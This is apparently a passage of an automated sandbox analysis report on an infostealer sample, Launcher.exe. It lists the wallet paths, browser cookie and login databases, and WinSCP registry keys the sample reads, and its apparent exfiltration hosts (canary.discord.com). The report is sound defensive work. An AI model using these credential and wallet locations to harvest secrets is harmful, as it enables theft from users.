        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: (insertion_info.second) == (true)
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore\
        Source: Launcher.exe, 00000000.00000003.1316755134.000001752613D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodusDecrypt
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\default_wallet
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \MultiDog\multidoge.wallet\
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\seed.seco
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore\
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Windows\System32\reg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite_tmp-walJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite_tmp-walJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-releaseJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite_tmp-shmJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite_tmp-shmJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile opened / queried: C:\Users\user\AppData\Roaming\.minecraftJump to behavior
        Source: Yara matchFile source: 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 5496, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Growtopia
        Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 5496, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		12
        Registry Run Keys / Startup Folder        		11
        Process Injection        		11
        Masquerading        		1
        OS Credential Dumping        		11
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		12
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts11
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		12
        Registry Run Keys / Startup Folder        		1
        Modify Registry        		1
        Credentials in Registry        		2
        Process Discovery        		Remote Desktop Protocol1
        Browser Session Hijacking        		1
        Non-Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		21
        Virtualization/Sandbox Evasion        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin Shares22
        Data from Local System        		2
        Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object Model1
        Clipboard Data        		Protocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information        		LSA Secrets1
        System Network Configuration Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials11
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync14
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632293 Sample: Launcher.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 56 discord.com 2->56 58 canary.discord.com 2->58 60 api.ipify.org 2->60 68 Antivirus / Scanner detection for submitted sample 2->68 70 Multi AV Scanner detection for dropped file 2->70 72 Multi AV Scanner detection for submitted file 2->72 74 3 other signatures 2->74 10 Launcher.exe 120 2->10         started        signatures3 process4 dnsIp5 62 api.ipify.org 104.26.13.205, 443, 49742 CLOUDFLARENETUS United States 10->62 64 canary.discord.com 162.159.137.232, 443, 49749, 49750 CLOUDFLARENETUS United States 10->64 48 C:\Users\user\AppData\Roaming\...\Update.exe, PE32+ 10->48 dropped 50 C:\Users\user\AppData\Roaming\temp.ps1, ASCII 10->50 dropped 52 C:\Users\user\...\places.sqlite_tmp-shm, data 10->52 dropped 54 16 other files (10 malicious) 10->54 dropped 76 Found many strings related to Crypto-Wallets (likely being stolen) 10->76 78 Overwrites Mozilla Firefox settings 10->78 80 Drops PE files to the startup folder 10->80 82 2 other signatures 10->82 15 cmd.exe 1 10->15         started        17 reg.exe 1 10->17         started        20 cmd.exe 1 10->20         started        22 17 other processes 10->22 file6 signatures7 process8 signatures9 24 powershell.exe 15 15->24         started        27 cmd.exe 1 15->27         started        66 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->66 29 powershell.exe 7 20->29         started        31 powershell.exe 7 22->31         started        33 powershell.exe 7 22->33         started        35 tasklist.exe 1 22->35         started        37 13 other processes 22->37 process10 file11 46 C:\Users\user\AppData\...\anq2mtqn.cmdline, Unicode 24->46 dropped 39 csc.exe 3 24->39         started        process12 file13 44 C:\Users\user\AppData\Local\...\anq2mtqn.dll, PE32 39->44 dropped 42 cvtres.exe 1 39->42         started        process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.